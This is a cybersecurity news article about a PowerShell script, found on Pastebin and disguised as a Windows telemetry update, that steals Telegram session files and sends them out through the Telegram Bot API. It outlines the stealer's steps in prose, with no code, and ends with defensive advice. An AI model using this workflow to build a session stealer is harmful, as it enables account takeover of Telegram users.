Cybersecurity experts have recently detected a malicious PowerShell script hosted on Pastebin, engineered to covertly steal session data from Telegram users. This script targets both desktop and web versions of Telegram, posing a significant risk to user privacy and security.
Disguised Under a Deceptive Name
The script masquerades as a typical Windows update, cleverly named “Windows Telemetry Update,” which misleads users into executing it without suspicion. Upon activation, it swiftly gathers host information such as the username, computer name, and public IP using api.ipify[.]org, before focusing on its primary goal of capturing Telegram session files.
These session files, found within the %APPDATA% directories for Telegram Desktop and Telegram Desktop Beta, are compressed into a file named “diag.zip” and temporarily stored in the user’s TEMP folder. The script’s deceptive nature makes it a high-severity threat, as identified by Flare analysts who continuously monitor Pastebin and similar platforms for malicious content.
Detailed Analysis and Development
According to the analysis, this script is specifically designed to steal Telegram session data, transmitting it via the Telegram Bot API. It operates alongside another tool targeting web-based sessions, sharing the same infrastructure. The script’s simplicity is overshadowed by the insights it provides into the development and testing of session-stealing tools.
Two versions of the script were discovered on Pastebin, both posted by the same user. The first version failed to send the “diag.zip” file due to a flawed multipart upload implementation. The operator later rectified this in the second version, which successfully uses the sendDocument endpoint with proper encoding, illustrating the debugging and refinement process publicly visible on Pastebin.
Operational Implications and Security Measures
Although the script lacks obfuscation and automatic execution mechanisms, its confirmed functionality indicates a potential for broader deployment. Security experts advise that the script may still be in testing but could soon be used in larger-scale operations.
The infection begins when the script is manually run, querying the Telegram Bot API and retrieving bot telemetry. After identifying Telegram installations, the script forcefully closes Telegram processes to unlock session files before compressing them. It then uploads the archive to the operator via the bot API, with a fallback method to ensure delivery. The script deletes any evidence post-upload to avoid detection.
For immediate protection, users should terminate all active Telegram sessions, change passwords, enable two-factor authentication, and review account activities. Network administrators should block specific domains or monitor unusual API calls to prevent further breaches.
Stay informed on cybersecurity updates by following us on Google News, LinkedIn, and X. Mark CSN as a preferred source on Google for instant updates.
